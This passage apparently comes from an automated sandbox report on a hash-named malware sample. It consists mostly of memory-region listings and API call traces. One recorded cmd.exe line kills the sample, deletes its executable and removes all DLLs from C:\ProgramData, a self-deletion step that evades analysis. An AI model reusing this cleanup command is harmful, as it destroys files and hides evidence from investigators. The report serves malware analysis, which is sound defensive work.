"pagefile_0x0000000000500000" filename = "" Region: id = 2476 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2477 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2478 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2479 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2480 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2481 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2482 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2483 start_va = 0x500000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2484 start_va = 0x500000 end_va = 0x501fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "faultrep.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\faultrep.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\faultrep.dll.mui") Region: id = 2485 start_va = 0x650000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 2486 start_va = 0x510000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2487 start_va = 0x6bf60000 end_va = 0x6c37dfff monitored = 0 entry_point = 0x6c05ee80 region_type = mapped_file name = "dbgeng.dll" filename = "\\Windows\\SysWOW64\\dbgeng.dll" (normalized: "c:\\windows\\syswow64\\dbgeng.dll") Region: id = 2488 start_va = 0x76150000 end_va = 0x761e1fff monitored = 0 entry_point = 0x76188cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2489 start_va = 0x6c740000 end_va = 0x6c7affff monitored = 0 entry_point = 0x6c794b90 region_type = mapped_file name = "dbgmodel.dll" filename = "\\Windows\\SysWOW64\\DbgModel.dll" (normalized: "c:\\windows\\syswow64\\dbgmodel.dll") Region: id = 2490 start_va = 0x70040000 end_va = 0x7006cfff monitored = 0 entry_point = 0x70052b00 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 2491 start_va = 0x7e0000 end_va = 0x8c9fff monitored = 0 entry_point = 0x81d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2492 start_va = 0x6cc40000 end_va = 0x6cc49fff monitored = 0 entry_point = 0x6cc43200 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 2493 start_va = 0x75790000 end_va = 0x757d4fff monitored = 0 entry_point = 0x757ade90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2494 start_va = 0x70030000 end_va = 0x70037fff monitored = 0 entry_point = 0x700317b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 2495 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 2496 start_va = 0x75160000 end_va = 0x7524afff monitored = 0 entry_point = 0x7519d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2497 start_va = 0x61d0000 end_va = 0x6506fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2498 start_va = 0x510000 end_va = 0x511fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2499 start_va = 0x510000 end_va = 0x513fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2500 start_va = 0x510000 end_va = 0x515fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2501 start_va = 0x510000 end_va = 0x517fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2502 start_va = 0x4940000 end_va = 0x4a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004940000" filename = "" Region: id = 2503 start_va = 0x4aa0000 end_va = 0x4aaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004aa0000" filename = "" Region: id = 2504 start_va = 0x510000 end_va = 0x519fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2505 start_va = 0x510000 end_va = 0x51bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2506 start_va = 0x510000 end_va = 0x51dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2507 start_va = 0x510000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2508 start_va = 0x530000 end_va = 0x541fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2509 start_va = 0x530000 end_va = 0x543fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2510 start_va = 0x530000 end_va = 0x545fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2511 start_va = 0x530000 end_va = 0x547fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2512 start_va = 0x530000 end_va = 0x549fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2513 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2514 start_va = 0x530000 end_va = 0x54dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2515 start_va = 0x530000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2516 start_va = 0x6510000 end_va = 0x660ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006510000" filename = "" Region: id = 2517 start_va = 0x6610000 end_va = 0x66effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 2518 start_va = 0x66f0000 end_va = 0x67b4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000066f0000" filename = "" Region: id = 2519 start_va = 0x67c0000 end_va = 0x686efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000067c0000" filename = "" Region: id = 2520 start_va = 0x6870000 end_va = 0x6a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006870000" filename = "" Region: id = 2521 start_va = 0x6a70000 end_va = 0x6b1efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a70000" filename = "" Region: id = 2522 start_va = 0x510000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2523 start_va = 0x530000 end_va = 0x532fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wer.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wer.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wer.dll.mui") Region: id = 2524 start_va = 0x540000 end_va = 0x543fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2525 start_va = 0x6a70000 end_va = 0x726ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006a70000" filename = "" Region: id = 2526 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2527 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2528 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2529 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2530 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2531 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2532 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2533 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2534 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2535 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2536 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2537 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2538 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2539 start_va = 0x66f0000 end_va = 0x67effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000066f0000" filename = "" Region: id = 2540 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2541 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2542 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2543 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2544 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2545 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2546 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2547 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2548 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2549 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2550 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2551 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2552 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2553 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2554 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2555 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2556 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2557 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2558 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2559 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2560 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2561 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2562 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2563 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2564 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2565 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2566 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2567 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2568 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2569 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2570 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2571 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2572 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2573 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2574 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2575 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2576 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2577 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2578 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2579 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2580 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2581 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2582 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2583 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2584 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2585 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2586 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2587 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2588 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2589 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2590 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2591 start_va = 0x550000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Thread: id = 40 os_tid = 0xe38 Thread: id = 41 os_tid = 0x9e8 Thread: id = 42 os_tid = 0x9ac Process: id = "16" image_name = "f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" page_root = "0x34d9b000" os_pid = "0xd5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x5bc" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe\" " cur_dir = "C:\\Windows\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Process: id = "17" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x3a7bc000" os_pid = "0x4d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x5bc" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /im f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe /f & timeout /t 6 & del /f /q \"C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe\" & del C:\\ProgramData\\*.dll & exit" cur_dir = "C:\\ProgramData\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2599 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2600 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2601 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2602 start_va = 0x50000 end_va = 0xa1fff monitored = 1 entry_point = 0x64fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 2603 start_va = 0xb0000 end_va = 0x40affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 2604 start_va = 0x40b0000 end_va = 0x40c4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000040b0000" filename = "" Region: id = 2605 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 2606 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 2607 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 2608 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 2609 start_va = 0x4400000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 2610 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2611 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2612 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2613 start_va = 0x7fff0000 end_va = 0x7dfb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2614 start_va = 0x7dfb28b00000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfb28b00000" filename = "" Region: id = 2615 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2616 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Region: id = 2617 start_va = 0x4610000 end_va = 0x461ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004610000" filename = "" Region: id = 2618 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2619 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2620 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2621 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2622 start_va = 0x4620000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004620000" filename = "" Region: id = 2623 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2624 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2625 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2626 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2714 start_va = 0x4130000 end_va = 0x41edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2715 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2716 start_va = 0x4500000 end_va = 0x453ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 2717 start_va = 0x4800000 end_va = 0x48fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2718 start_va = 0x4900000 end_va = 0x49fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004900000" filename = "" Region: id = 2719 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2722 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2723 start_va = 0x4a00000 end_va = 0x4d36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 43 os_tid = 0xce4 [0127.029] GetModuleHandleA (lpModuleName=0x0) returned 0x50000 [0127.029] __set_app_type (_Type=0x1) [0127.029] __p__fmode () returned 0x75734d6c [0127.029] __p__commode () returned 0x75735b1c [0127.029] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x65200) returned 0x0 [0127.029] __getmainargs (in: _Argc=0x760e8, _Argv=0x760ec, _Env=0x760f0, _DoWildCard=0, _StartInfo=0x760fc | out: _Argc=0x760e8, _Argv=0x760ec, _Env=0x760f0) returned 0 [0127.035] GetCurrentThreadId () returned 0xce4 [0127.035] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xce4) returned 0x84 [0127.036] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74650000 [0127.036] GetProcAddress (hModule=0x74650000, lpProcName="SetThreadUILanguage") returned 0x74692510 [0127.036] SetThreadUILanguage (LangId=0x0) returned 0x409 [0127.073] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0127.073] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x44fff18 